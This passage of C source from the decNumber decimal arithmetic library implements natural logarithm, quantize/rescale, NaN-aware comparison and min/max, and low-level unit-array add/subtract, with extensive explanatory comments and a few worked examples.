increasing the table */ /* size. */ /* */ /* 5. The static buffers are larger than might be expected to allow */ /* for calls from decNumberPower. */ /* ------------------------------------------------------------------ */ static decNumber *decLnOp(decNumber *res, const decNumber *rhs, decContext *set, uInt *status) { uInt ignore=0; /* working status accumulator */ uInt needbytes; /* for space calculations */ Int residue; /* rounding residue */ Int r; /* rhs=f*10**r [see below] */ Int p; /* working precision */ Int pp; /* precision for iteration */ Int t; /* work */ /* buffers for a (accumulator, typically precision+2) and b */ /* (adjustment calculator, same size) */ decNumber bufa[D2N(DECBUFFER+12)]; decNumber *allocbufa=NULL; /* -> allocated bufa, iff allocated */ decNumber *a=bufa; /* accumulator/work */ decNumber bufb[D2N(DECBUFFER*2+2)]; decNumber *allocbufb=NULL; /* -> allocated bufb, iff allocated */ decNumber *b=bufb; /* adjustment/work */ decNumber numone; /* constant 1 */ decNumber cmp; /* work */ decContext aset, bset; /* working contexts */ #if DECCHECK Int iterations=0; /* for later sanity check */ if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif do { /* protect allocated storage */ if (SPECIALARG) { /* handle infinities and NaNs */ if (decNumberIsInfinite(rhs)) { /* an infinity */ if (decNumberIsNegative(rhs)) /* -Infinity -> error */ *status|=DEC_Invalid_operation; else decNumberCopy(res, rhs); /* +Infinity -> self */ } else decNaNs(res, rhs, NULL, set, status); /* a NaN */ break;} if (ISZERO(rhs)) { /* +/- zeros -> -Infinity */ decNumberZero(res); /* make clean */ res->bits=DECINF|DECNEG; /* set - infinity */ break;} /* [no status to set] */ /* Non-zero negatives are bad...
*/ if (decNumberIsNegative(rhs)) { /* -x -> error */ *status|=DEC_Invalid_operation; break;} /* Here, rhs is positive, finite, and in range */ /* lookaside fastpath code for ln(2) and ln(10) at common lengths */ if (rhs->exponent==0 && set->digits<=40) { #if DECDPUN==1 if (rhs->lsu[0]==0 && rhs->lsu[1]==1 && rhs->digits==2) { /* ln(10) */ #else if (rhs->lsu[0]==10 && rhs->digits==2) { /* ln(10) */ #endif aset=*set; aset.round=DEC_ROUND_HALF_EVEN; #define LN10 "2.302585092994045684017991454684364207601" decNumberFromString(res, LN10, &aset); *status|=(DEC_Inexact | DEC_Rounded); /* is inexact */ break;} if (rhs->lsu[0]==2 && rhs->digits==1) { /* ln(2) */ aset=*set; aset.round=DEC_ROUND_HALF_EVEN; #define LN2 "0.6931471805599453094172321214581765680755" decNumberFromString(res, LN2, &aset); *status|=(DEC_Inexact | DEC_Rounded); break;} } /* integer and short */ /* Determine the working precision. This is normally the */ /* requested precision + 2, with a minimum of 9. However, if */ /* the rhs is 'over-precise' then allow for all its digits to */ /* potentially participate (consider an rhs where all the excess */ /* digits are 9s) so in this case use rhs->digits+2. */ p=MAXI(rhs->digits, MAXI(set->digits, 7))+2; /* Allocate space for the accumulator and the high-precision */ /* adjustment calculator, if necessary. The accumulator must */ /* be able to hold p digits, and the adjustment up to */ /* rhs->digits+p digits. They are also made big enough for 16 */ /* digits so that they can be used for calculating the initial */ /* estimate. */ needbytes=sizeof(decNumber)+(D2U(MAXI(p,16))-1)*sizeof(Unit); if (needbytes>sizeof(bufa)) { /* need malloc space */ allocbufa=(decNumber *)malloc(needbytes); if (allocbufa==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} a=allocbufa; /* use the allocated space */ } pp=p+rhs->digits; needbytes=sizeof(decNumber)+(D2U(MAXI(pp,16))-1)*sizeof(Unit); if (needbytes>sizeof(bufb)) { /* need malloc space */ allocbufb=(decNumber *)malloc(needbytes); if (allocbufb==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} b=allocbufb; /* use the allocated space */ } /* Prepare an initial estimate in acc. Calculate this by */ /* considering the coefficient of x to be a normalized fraction, */ /* f, with the decimal point at far left and multiplied by */ /* 10**r. Then, rhs=f*10**r and 0.1<=f<1, and */ /* ln(x) = ln(f) + ln(10)*r */ /* Get the initial estimate for ln(f) from a small lookup */ /* table (see above) indexed by the first two digits of f, */ /* truncated. */ decContextDefault(&aset, DEC_INIT_DECIMAL64); /* 16-digit extended */ r=rhs->exponent+rhs->digits; /* 'normalised' exponent */ decNumberFromInt32(a, r); /* a=r */ decNumberFromInt32(b, 2302585); /* b=ln(10) (2.302585) */ b->exponent=-6; /* .. 
*/ decMultiplyOp(a, a, b, &aset, &ignore); /* a=a*b */ /* now get top two digits of rhs into b by simple truncate and */ /* force to integer */ residue=0; /* (no residue) */ aset.digits=2; aset.round=DEC_ROUND_DOWN; decCopyFit(b, rhs, &aset, &residue, &ignore); /* copy & shorten */ b->exponent=0; /* make integer */ t=decGetInt(b); /* [cannot fail] */ if (t<10) t=X10(t); /* adjust single-digit b */ t=LNnn[t-10]; /* look up ln(b) */ decNumberFromInt32(b, t>>2); /* b=ln(b) coefficient */ b->exponent=-(t&3)-3; /* set exponent */ b->bits=DECNEG; /* ln(0.10)->ln(0.99) always -ve */ aset.digits=16; aset.round=DEC_ROUND_HALF_EVEN; /* restore */ decAddOp(a, a, b, &aset, 0, &ignore); /* acc=a+b */ /* the initial estimate is now in a, with up to 4 digits correct. */ /* When rhs is at or near Nmax the estimate will be low, so we */ /* will approach it from below, avoiding overflow when calling exp. */ decNumberZero(&numone); *numone.lsu=1; /* constant 1 for adjustment */ /* accumulator bounds are as requested (could underflow, but */ /* cannot overflow) */ aset.emax=set->emax; aset.emin=set->emin; aset.clamp=0; /* no concrete format */ /* set up a context to be used for the multiply and subtract */ bset=aset; bset.emax=DEC_MAX_MATH*2; /* use double bounds for the */ bset.emin=-DEC_MAX_MATH*2; /* adjustment calculation */ /* [see decExpOp call below] */ /* for each iteration double the number of digits to calculate, */ /* up to a maximum of p */ pp=9; /* initial precision */ /* [initially 9 as then the sequence starts 7+2, 16+2, and */ /* 34+2, which is ideal for standard-sized numbers] */ aset.digits=pp; /* working context */ bset.digits=pp+rhs->digits; /* wider context */ for (;;) { /* iterate */ #if DECCHECK iterations++; if (iterations>24) break; /* consider 9 * 2**24 */ #endif /* calculate the adjustment (exp(-a)*x-1) into b. This is a */ /* catastrophic subtraction but it really is the difference */ /* from 1 that is of interest. */ /* Use the internal entry point to Exp as it allows the double */ /* range for calculating exp(-a) when a is the tiniest subnormal. */ a->bits^=DECNEG; /* make -a */ decExpOp(b, a, &bset, &ignore); /* b=exp(-a) */ a->bits^=DECNEG; /* restore sign of a */ /* now multiply by rhs and subtract 1, at the wider precision */ decMultiplyOp(b, b, rhs, &bset, &ignore); /* b=b*rhs */ decAddOp(b, b, &numone, &bset, DECNEG, &ignore); /* b=b-1 */ /* the iteration ends when the adjustment cannot affect the */ /* result by >=0.5 ulp (at the requested digits), which */ /* is when its value is smaller than the accumulator by */ /* set->digits+1 digits (or it is zero) -- this is a looser */ /* requirement than for Exp because all that happens to the */ /* accumulator after this is the final rounding (but note that */ /* there must also be full precision in a, or a=0). */ if (decNumberIsZero(b) || (a->digits+a->exponent)>=(b->digits+b->exponent+set->digits+1)) { if (a->digits==p) break; if (decNumberIsZero(a)) { decCompareOp(&cmp, rhs, &numone, &aset, COMPARE, &ignore); /* rhs=1 ? */ if (cmp.lsu[0]==0) a->exponent=0; /* yes, exact 0 */ else *status|=(DEC_Inexact | DEC_Rounded); /* no, inexact */ break; } /* force padding if adjustment has gone to 0 before full length */ if (decNumberIsZero(b)) b->exponent=a->exponent-p; } /* not done yet ... 
*/ decAddOp(a, a, b, &aset, 0, &ignore); /* a=a+b for next estimate */ if (pp==p) continue; /* precision is at maximum */ /* lengthen the next calculation */ pp=pp*2; /* double precision */ if (pp>p) pp=p; /* clamp to maximum */ aset.digits=pp; /* working context */ bset.digits=pp+rhs->digits; /* wider context */ } /* Newton's iteration */ #if DECCHECK /* just a sanity check; remove the test to show always */ if (iterations>24) printf("Ln iterations=%ld, status=%08lx, p=%ld, d=%ld\n", iterations, *status, p, rhs->digits); #endif /* Copy and round the result to res */ residue=1; /* indicate dirt to right */ if (ISZERO(a)) residue=0; /* .. unless underflowed to 0 */ aset.digits=set->digits; /* [use default rounding] */ decCopyFit(res, a, &aset, &residue, status); /* copy & shorten */ decFinish(res, set, &residue, status); /* cleanup/set flags */ } while(0); /* end protected */ if (allocbufa!=NULL) free(allocbufa); /* drop any storage used */ if (allocbufb!=NULL) free(allocbufb); /* .. */ /* [status is handled by caller] */ return res; } /* decLnOp */ /* ------------------------------------------------------------------ */ /* decQuantizeOp -- force exponent to requested value */ /* */ /* This computes C = op(A, B), where op adjusts the coefficient */ /* of C (by rounding or shifting) such that the exponent (-scale) */ /* of C has the value B or matches the exponent of B. */ /* The numerical value of C will equal A, except for the effects of */ /* any rounding that occurred. */ /* */ /* res is C, the result. C may be A or B */ /* lhs is A, the number to adjust */ /* rhs is B, the requested exponent */ /* set is the context */ /* quant is 1 for quantize or 0 for rescale */ /* status is the status accumulator (this can be called without */ /* risk of control loss) */ /* */ /* C must have space for set->digits digits. */ /* */ /* Unless there is an error or the result is infinite, the exponent */ /* after the operation is guaranteed to be that requested. 
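*/
/* [Illustrative results, assuming the usual decimal-arithmetic */
/* semantics: quantize(2.17, 0.001) -> 2.170, quantize(2.17, 0.1) */
/* -> 2.2, and quantize(217, 1E+2) -> 2E+2; in each case the */
/* result takes the exponent of the right-hand operand and the */
/* coefficient is rounded or padded to match.] */
/*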
*/ /* ------------------------------------------------------------------ */ static decNumber * decQuantizeOp(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set, Flag quant, uInt *status) { #if DECSUBSET decNumber *alloclhs=NULL; /* non-NULL if rounded lhs allocated */ decNumber *allocrhs=NULL; /* .., rhs */ #endif const decNumber *inrhs=rhs; /* save original rhs */ Int reqdigits=set->digits; /* requested DIGITS */ Int reqexp; /* requested exponent [-scale] */ Int residue=0; /* rounding residue */ Int etiny=set->emin-(reqdigits-1); #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operands and set lostDigits status, as needed */ if (lhs->digits>reqdigits) { alloclhs=decRoundOperand(lhs, set, status); if (alloclhs==NULL) break; lhs=alloclhs; } if (rhs->digits>reqdigits) { /* [this only checks lostDigits] */ allocrhs=decRoundOperand(rhs, set, status); if (allocrhs==NULL) break; rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ /* Handle special values */ if (SPECIALARGS) { /* NaNs get usual processing */ if (SPECIALARGS & (DECSNAN | DECNAN)) decNaNs(res, lhs, rhs, set, status); /* one infinity but not both is bad */ else if ((lhs->bits ^ rhs->bits) & DECINF) *status|=DEC_Invalid_operation; /* both infinity: return lhs */ else decNumberCopy(res, lhs); /* [nop if in place] */ break; } /* set requested exponent */ if (quant) reqexp=inrhs->exponent; /* quantize -- match exponents */ else { /* rescale -- use value of rhs */ /* Original rhs must be an integer that fits and is in range, */ /* which could be from -1999999997 to +999999999, thanks to */ /* subnormals */ reqexp=decGetInt(inrhs); /* [cannot fail] */ } #if DECSUBSET if (!set->extended) etiny=set->emin; /* no subnormals */ #endif if (reqexp==BADINT /* bad (rescale only) or .. */ || reqexp==BIGODD || reqexp==BIGEVEN /* very big (ditto) or .. */ || (reqexp<etiny) /* < lowest */ || (reqexp>set->emax)) { /* > emax */ *status|=DEC_Invalid_operation; break;} /* the RHS has been processed, so it can be overwritten now if necessary */ if (ISZERO(lhs)) { /* zero coefficient unchanged */ decNumberCopy(res, lhs); /* [nop if in place] */ res->exponent=reqexp; /* .. just set exponent */ #if DECSUBSET if (!set->extended) res->bits=0; /* subset specification; no -0 */ #endif } else { /* non-zero lhs */ Int adjust=reqexp-lhs->exponent; /* digit adjustment needed */ /* if adjusted coefficient will definitely not fit, give up now */ if ((lhs->digits-adjust)>reqdigits) { *status|=DEC_Invalid_operation; break; } if (adjust>0) { /* increasing exponent */ /* this will decrease the length of the coefficient by adjust */ /* digits, and must round as it does so */ decContext workset; /* work */ workset=*set; /* clone rounding, etc. */ workset.digits=lhs->digits-adjust; /* set requested length */ /* [note that the latter can be <1, here] */ decCopyFit(res, lhs, &workset, &residue, status); /* fit to result */ decApplyRound(res, &workset, residue, status); /* .. and round */ residue=0; /* [used] */ /* If just rounded a 999s case, exponent will be off by one; */ /* adjust back (after checking space), if so. 
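*/
/* [Illustrative walk-through of the case just described, not part */
/* of the original commentary: rescaling 9999E-4 to exponent -3 */
/* rounds at workset.digits=4-1=3, giving 100E-2 -- an exponent one */
/* above the requested -3. With set->digits=4 there is room to */
/* append a zero (1000E-3), but with set->digits=3 the coefficient */
/* cannot lengthen and Invalid_operation results.] */
/*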
*/ if (res->exponent>reqexp) { /* re-check needed, e.g., for quantize(0.9999, 0.001) under */ /* set->digits==3 */ if (res->digits==reqdigits) { /* cannot shift by 1 */ *status&=~(DEC_Inexact | DEC_Rounded); /* [clean these] */ *status|=DEC_Invalid_operation; break; } res->digits=decShiftToMost(res->lsu, res->digits, 1); /* shift */ res->exponent--; /* (re)adjust the exponent. */ } #if DECSUBSET if (ISZERO(res) && !set->extended) res->bits=0; /* subset; no -0 */ #endif } /* increase */ else /* adjust<=0 */ { /* decreasing or = exponent */ /* this will increase the length of the coefficient by -adjust */ /* digits, by adding zero or more trailing zeros; this is */ /* already checked for fit, above */ decNumberCopy(res, lhs); /* [it will fit] */ /* if padding needed (adjust<0), add it now... */ if (adjust<0) { res->digits=decShiftToMost(res->lsu, res->digits, -adjust); res->exponent+=adjust; /* adjust the exponent */ } } /* decrease */ } /* non-zero */ /* Check for overflow [do not use Finalize in this case, as an */ /* overflow here is a "don't fit" situation] */ if (res->exponent>set->emax-res->digits+1) { /* too big */ *status|=DEC_Invalid_operation; break; } else { decFinalize(res, set, &residue, status); /* set subnormal flags */ *status&=~DEC_Underflow; /* suppress Underflow [754r] */ } } while(0); /* end protected */ #if DECSUBSET if (allocrhs!=NULL) free(allocrhs); /* drop any storage used */ if (alloclhs!=NULL) free(alloclhs); /* .. */ #endif return res; } /* decQuantizeOp */ /* ------------------------------------------------------------------ */ /* decCompareOp -- compare, min, or max two Numbers */ /* */ /* This computes C = A ? B and carries out one of the following */ /* operations: */ /* COMPARE -- returns the signum (as a number) giving the */ /* result of a comparison unless one or both */ /* operands is a NaN (in which case a NaN results) */ /* COMPSIG -- as COMPARE except that a quiet NaN raises */ /* Invalid operation. */ /* COMPMAX -- returns the larger of the operands, using the */ /* 754r maxnum operation */ /* COMPMAXMAG -- ditto, comparing absolute values */ /* COMPMIN -- the 754r minnum operation */ /* COMPMINMAG -- ditto, comparing absolute values */ /* COMPTOTAL -- returns the signum (as a number) giving the */ /* result of a comparison using 754r total ordering */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X?X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* op is the operation flag */ /* status is the usual accumulator */ /* */ /* C must have space for one digit for COMPARE or set->digits for */ /* COMPMAX, COMPMIN, COMPMAXMAG, or COMPMINMAG. */ /* ------------------------------------------------------------------ */ /* The emphasis here is on speed for common cases, and avoiding */ /* coefficient comparison if possible.
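*/
/* [Illustrative of the 754r rules assumed above: COMPMAX with a */
/* single quiet NaN returns the numeric operand, so max(NaN, 3) */
/* gives 3, whereas COMPARE with any NaN operand propagates a NaN; */
/* COMPTOTAL orders -NaN < -sNaN < -Inf < negative finites < -0 < */
/* +0 < positive finites < +Inf < +sNaN < +NaN.] */
/*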
*/ /* ------------------------------------------------------------------ */ static decNumber *decCompareOp(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set, Flag op, uInt *status) { #if DECSUBSET decNumber *alloclhs=NULL; /* non-NULL if rounded lhs allocated */ decNumber *allocrhs=NULL; /* .., rhs */ #endif Int result=0; /* default result value */ uByte merged; /* work */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operands and set lostDigits status, as needed */ if (lhs->digits>set->digits) { alloclhs=decRoundOperand(lhs, set, status); if (alloclhs==NULL) {result=BADINT; break;} lhs=alloclhs; } if (rhs->digits>set->digits) { allocrhs=decRoundOperand(rhs, set, status); if (allocrhs==NULL) {result=BADINT; break;} rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ /* If total ordering then handle differing signs 'up front' */ if (op==COMPTOTAL) { /* total ordering */ if (decNumberIsNegative(lhs) && !decNumberIsNegative(rhs)) { result=-1; break; } if (!decNumberIsNegative(lhs) && decNumberIsNegative(rhs)) { result=+1; break; } } /* handle NaNs specially; let infinities drop through */ /* This assumes sNaN (even just one) leads to NaN. */ merged=(lhs->bits | rhs->bits) & (DECSNAN | DECNAN); if (merged) { /* a NaN bit set */ if (op==COMPARE); /* result will be NaN */ else if (op==COMPSIG) /* treat qNaN as sNaN */ *status|=DEC_Invalid_operation | DEC_sNaN; else if (op==COMPTOTAL) { /* total ordering, always finite */ /* signs are known to be the same; compute the ordering here */ /* as if the signs are both positive, then invert for negatives */ if (!decNumberIsNaN(lhs)) result=-1; else if (!decNumberIsNaN(rhs)) result=+1; /* here if both NaNs */ else if (decNumberIsSNaN(lhs) && decNumberIsQNaN(rhs)) result=-1; else if (decNumberIsQNaN(lhs) && decNumberIsSNaN(rhs)) result=+1; else { /* both NaN or both sNaN */ /* now it just depends on the payload */ result=decUnitCompare(lhs->lsu, D2U(lhs->digits), rhs->lsu, D2U(rhs->digits), 0); /* [Error not possible, as these are 'aligned'] */ } /* both same NaNs */ if (decNumberIsNegative(lhs)) result=-result; break; } /* total order */ else if (merged & DECSNAN); /* sNaN -> qNaN */ else { /* here if MIN or MAX and one or two quiet NaNs */ /* min or max -- 754r rules ignore single NaN */ if (!decNumberIsNaN(lhs) || !decNumberIsNaN(rhs)) { /* just one NaN; force choice to be the non-NaN operand */ op=COMPMAX; if (lhs->bits & DECNAN) result=-1; /* pick rhs */ else result=+1; /* pick lhs */ break; } } /* max or min */ op=COMPNAN; /* use special path */ decNaNs(res, lhs, rhs, set, status); /* propagate NaN */ break; } /* have numbers */ if (op==COMPMAXMAG || op==COMPMINMAG) result=decCompare(lhs, rhs, 1); else result=decCompare(lhs, rhs, 0); /* sign matters */ } while(0); /* end protected */ if (result==BADINT) *status|=DEC_Insufficient_storage; /* rare */ else { if (op==COMPARE || op==COMPSIG ||op==COMPTOTAL) { /* returning signum */ if (op==COMPTOTAL && result==0) { /* operands are numerically equal or same NaN (and same sign, */ /* tested first); if identical, leave result 0 */ if (lhs->exponent!=rhs->exponent) { if (lhs->exponent<rhs->exponent) result=-1; else result=+1; if (decNumberIsNegative(lhs)) result=-result; } /* lexp!=rexp */ } /* total-order by exponent */ decNumberZero(res); /* [always a valid result] */ if (result!=0) { /* must be -1 or +1 */ *res->lsu=1; if (result<0) 
res->bits=DECNEG; } } else if (op==COMPNAN); /* special, drop through */ else { /* MAX or MIN, non-NaN result */ Int residue=0; /* rounding accumulator */ /* choose the operand for the result */ const decNumber *choice; if (result==0) { /* operands are numerically equal */ /* choose according to sign then exponent (see 754r) */ uByte slhs=(lhs->bits & DECNEG); uByte srhs=(rhs->bits & DECNEG); #if DECSUBSET if (!set->extended) { /* subset: force left-hand */ op=COMPMAX; result=+1; } else #endif if (slhs!=srhs) { /* signs differ */ if (slhs) result=-1; /* rhs is max */ else result=+1; /* lhs is max */ } else if (slhs && srhs) { /* both negative */ if (lhs->exponent<rhs->exponent) result=+1; else result=-1; /* [if equal, use lhs, technically identical] */ } else { /* both positive */ if (lhs->exponent>rhs->exponent) result=+1; else result=-1; /* [ditto] */ } } /* numerically equal */ /* here result will be non-0; reverse if looking for MIN */ if (op==COMPMIN || op==COMPMINMAG) result=-result; choice=(result>0 ? lhs : rhs); /* choose */ /* copy chosen to result, rounding if need be */ decCopyFit(res, choice, set, &residue, status); decFinish(res, set, &residue, status); } } #if DECSUBSET if (allocrhs!=NULL) free(allocrhs); /* free any storage used */ if (alloclhs!=NULL) free(alloclhs); /* .. */ #endif return res; } /* decCompareOp */ /* ------------------------------------------------------------------ */ /* decCompare -- compare two decNumbers by numerical value */ /* */ /* This routine compares A ? B without altering them. */ /* */ /* Arg1 is A, a decNumber which is not a NaN */ /* Arg2 is B, a decNumber which is not a NaN */ /* Arg3 is 1 for a sign-independent compare, 0 otherwise */ /* */ /* returns -1, 0, or 1 for A<B, A==B, or A>B, or BADINT if failure */ /* (the only possible failure is an allocation error) */ /* ------------------------------------------------------------------ */ static Int decCompare(const decNumber *lhs, const decNumber *rhs, Flag abs) { Int result; /* result value */ Int sigr; /* rhs signum */ Int compare; /* work */ result=1; /* assume signum(lhs) */ if (ISZERO(lhs)) result=0; if (abs) { if (ISZERO(rhs)) return result; /* LHS wins or both 0 */ /* RHS is non-zero */ if (result==0) return -1; /* LHS is 0; RHS wins */ /* [here, both non-zero, result=1] */ } else { /* signs matter */ if (result && decNumberIsNegative(lhs)) result=-1; sigr=1; /* compute signum(rhs) */ if (ISZERO(rhs)) sigr=0; else if (decNumberIsNegative(rhs)) sigr=-1; if (result > sigr) return +1; /* L > R, return 1 */ if (result < sigr) return -1; /* L < R, return -1 */ if (result==0) return 0; /* both 0 */ } /* signums are the same; both are non-zero */ if ((lhs->bits | rhs->bits) & DECINF) { /* one or more infinities */ if (decNumberIsInfinite(rhs)) { if (decNumberIsInfinite(lhs)) result=0;/* both infinite */ else result=-result; /* only rhs infinite */ } return result; } /* must compare the coefficients, allowing for exponents */ if (lhs->exponent>rhs->exponent) { /* LHS exponent larger */ /* swap sides, and sign */ const decNumber *temp=lhs; lhs=rhs; rhs=temp; result=-result; } compare=decUnitCompare(lhs->lsu, D2U(lhs->digits), rhs->lsu, D2U(rhs->digits), rhs->exponent-lhs->exponent); if (compare!=BADINT) compare*=result; /* comparison succeeded */ return compare; } /* decCompare */ /* ------------------------------------------------------------------ */ /* decUnitCompare -- compare two >=0 integers in Unit arrays */ /* */ /* This routine compares A ? 
B*10**E where A and B are unit arrays */ /* A is a plain integer */ /* B has an exponent of E (which must be non-negative) */ /* */ /* Arg1 is A first Unit (lsu) */ /* Arg2 is A length in Units */ /* Arg3 is B first Unit (lsu) */ /* Arg4 is B length in Units */ /* Arg5 is E (0 if the units are aligned) */ /* */ /* returns -1, 0, or 1 for A<B, A==B, or A>B, or BADINT if failure */ /* (the only possible failure is an allocation error, which can */ /* only occur if E!=0) */ /* ------------------------------------------------------------------ */ static Int decUnitCompare(const Unit *a, Int alength, const Unit *b, Int blength, Int exp) { Unit *acc; /* accumulator for result */ Unit accbuff[SD2U(DECBUFFER*2+1)]; /* local buffer */ Unit *allocacc=NULL; /* -> allocated acc buffer, iff allocated */ Int accunits, need; /* units in use or needed for acc */ const Unit *l, *r, *u; /* work */ Int expunits, exprem, result; /* .. */ if (exp==0) { /* aligned; fastpath */ if (alength>blength) return 1; if (alength<blength) return -1; /* same number of units in both -- need unit-by-unit compare */ l=a+alength-1; r=b+alength-1; for (;l>=a; l--, r--) { if (*l>*r) return 1; if (*l<*r) return -1; } return 0; /* all units match */ } /* aligned */ /* Unaligned. If one is >1 unit longer than the other, padded */ /* approximately, then can return easily */ if (alength>blength+(Int)D2U(exp)) return 1; if (alength+1<blength+(Int)D2U(exp)) return -1; /* Need to do a real subtract. For this, a result buffer is needed */ /* even though only the sign is of interest. Its length needs */ /* to be the larger of alength and padded blength, +2 */ need=blength+D2U(exp); /* maximum real length of B */ if (need<alength) need=alength; need+=2; acc=accbuff; /* assume use local buffer */ if (need*sizeof(Unit)>sizeof(accbuff)) { allocacc=(Unit *)malloc(need*sizeof(Unit)); if (allocacc==NULL) return BADINT; /* hopeless -- abandon */ acc=allocacc; } /* Calculate units and remainder from exponent. */ expunits=exp/DECDPUN; exprem=exp%DECDPUN; /* subtract [A+B*(-m)] */ accunits=decUnitAddSub(a, alength, b, blength, expunits, acc, -(Int)powers[exprem]); /* [UnitAddSub result may have leading zeros, even on zero] */ if (accunits<0) result=-1; /* negative result */ else { /* non-negative result */ /* check units of the result before freeing any storage */ for (u=acc; u<acc+accunits-1 && *u==0;) u++; result=(*u==0 ? 0 : +1); } /* clean up and return the result */ if (allocacc!=NULL) free(allocacc); /* drop any storage used */ return result; } /* decUnitCompare */ /* ------------------------------------------------------------------ */ /* decUnitAddSub -- add or subtract two >=0 integers in Unit arrays */ /* */ /* This routine performs the calculation: */ /* */ /* C=A+(B*M) */ /* */ /* Where M is in the range -DECDPUNMAX through +DECDPUNMAX. */ /* */ /* A may be shorter or longer than B. */ /* */ /* Leading zeros are not removed after a calculation. The result is */ /* either the same length as the longer of A and B (adding any */ /* shift), or one Unit longer than that (if a Unit carry occurred). */ /* */ /* A and B content are not altered unless C is also A or B. */ /* C may be the same array as A or B, but only if no zero padding is */ /* requested (that is, C may be B only if bshift==0). */ /* C is filled from the lsu; only those units necessary to complete */ /* the calculation are referenced. 
*/ /* */ /* Arg1 is A first Unit (lsu) */ /* Arg2 is A length in Units */ /* Arg3 is B first Unit (lsu) */ /* Arg4 is B length in Units */ /* Arg5 is B shift in Units (>=0; pads with 0 units if positive) */ /* Arg6 is C first Unit (lsu) */ /* Arg7 is M, the multiplier */ /* */ /* returns the count of Units written to C, which will be non-zero */ /* and negated if the result is negative. That is, the sign of the */ /* returned Int is the sign of the result (positive for zero) and */ /* the absolute value of the Int is the count of Units. */ /* */ /* It is the caller's responsibility to make sure that C size is */ /* safe, allowing space if necessary for a one-Unit carry. */ /* */ /* This routine is severely performance-critical; *any* change here */ /* must be measured (timed) to assure no performance degradation. */ /* In particular, trickery here tends to be counter-productive, as */ /* increased complexity of code hurts register optimizations on */ /* register-poor architectures. Avoiding divisions is nearly */ /* always a Good Idea, however. */ /* */ /* Special thanks to Rick McGuire (IBM Cambridge, MA) and Dave Clark */ /* (IBM Warwick, UK) for some of the ideas used in this routine. */ /* ------------------------------------------------------------------ */ static Int decUnitAddSub(const Unit *a, Int alength, const Unit *b, Int blength, Int bshift, Unit *c, Int m) { const Unit *alsu=a; /* A lsu [need to remember it] */ Unit *clsu=c; /* C ditto */ Unit *minC; /* low water mark for C */ Unit *maxC; /* high water mark for C */ eInt carry=0; /* carry integer (could be Long) */ Int add; /* work */ #if DECDPUN<=4 /* myriadal, millenary, etc. */ Int est; /* estimated quotient */ #endif #if DECTRACE if (alength<1 || blength<1) printf("decUnitAddSub: alen blen m %ld %ld [%ld]\n", alength, blength, m); #endif maxC=c+alength; /* A is usually the longer */ minC=c+blength; /* .. and B the shorter */ if (bshift!=0) { /* B is shifted; low As copy across */ minC+=bshift; /* if in place [common], skip copy unless there's a gap [rare] */ if (a==c && bshift<=alength) { c+=bshift; a+=bshift; } else for (; c<clsu+bshift; a++, c++) { /* copy needed */ if (a<alsu+alength) *c=*a; else *c=0; } } if (minC>maxC) { /* swap */ Unit *hold=minC; minC=maxC; maxC=hold; } /* For speed, do the addition as two loops; the first where both A */ /* and B contribute, and the second (if necessary) where only one or */ /* other of the numbers contribute. */ /* Carry handling is the same (i.e., duplicated) in each case. 
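*/
/* [Editor's illustrative note -- not part of the original source] */
/* A worked example: with DECDPUN=4 (units hold 0-9999), computing */
/* C=A+(B*M) for A={9999}, B={2}, M=3, and no shift gives */
/* carry=9999+6=10005 for the first unit. The fastpath fails, the */
/* divide-by-multiply estimate of 10005/10000 comes out one low */
/* (0), and the correction bumps it, leaving unit 0 as 0005 with */
/* carry 1; the final carry is appended as a new unit, so */
/* C={0005,0001} (i.e., 10005) and the returned unit count is +2. */
/*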
*/ for (; c<minC; c++) { carry+=*a; a++; carry+=((eInt)*b)*m; /* [special-casing m=1/-1 */ b++; /* here is not a win] */ /* here carry is new Unit of digits; it could be +ve or -ve */ if ((ueInt)carry<=DECDPUNMAX) { /* fastpath 0-DECDPUNMAX */ *c=(Unit)carry; carry=0; continue; } #if DECDPUN==4 /* use divide-by-multiply */ if (carry>=0) { est=(((ueInt)carry>>11)*53687)>>18; *c=(Unit)(carry-est*(DECDPUNMAX+1)); /* remainder */ carry=est; /* likely quotient [89%] */ if (*c<DECDPUNMAX+1) continue; /* estimate was correct */ carry++; *c-=DECDPUNMAX+1; continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ est=(((ueInt)carry>>11)*53687)>>18; *c=(Unit)(carry-est*(DECDPUNMAX+1)); carry=est-(DECDPUNMAX+1); /* correctly negative */ if (*c<DECDPUNMAX+1) continue; /* was OK */ carry++; *c-=DECDPUNMAX+1; #elif DECDPUN==3 if (carry>=0) { est=(((ueInt)carry>>3)*16777)>>21; *c=(Unit)(carry-est*(DECDPUNMAX+1)); /* remainder */ carry=est; /* likely quotient [99%] */ if (*c<DECDPUNMAX+1) continue; /* estimate was correct */ carry++; *c-=DECDPUNMAX+1; continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ est=(((ueInt)carry>>3)*16777)>>21; *c=(Unit)(carry-est*(DECDPUNMAX+1)); carry=est-(DECDPUNMAX+1); /* correctly negative */ if (*c<DECDPUNMAX+1) continue; /* was OK */ carry++; *c-=DECDPUNMAX+1; #elif DECDPUN<=2 /* Can use QUOT10 as carry <= 4 digits */ if (carry>=0) { est=QUOT10(carry, DECDPUN); *c=(Unit)(carry-est*(DECDPUNMAX+1)); /* remainder */ carry=est; /* quotient */ continue; } /* negative case */ carry=carry+(eInt)(DECDPUNMAX+1)*(DECDPUNMAX+1); /* make positive */ est=QUOT10(carry, DECDPUN); *c=(Unit)(carry-est*(DECDPUNMAX+1)); carry=est-(DECDPUNMAX+1); /* correctly negative */ #else /* remainder operator is undefined if negative, so must test */ if ((ueInt)carry<(DECDPUNMAX+1)*2) { /* fastpath carry +1 */ *c=(Unit)(carry-(DECDPUNMAX+1)); /* [helps additions] */ carry=1; continue; } if (carry>=0) { *c=(Unit)(carry%(DECDPUNMAX+1)); 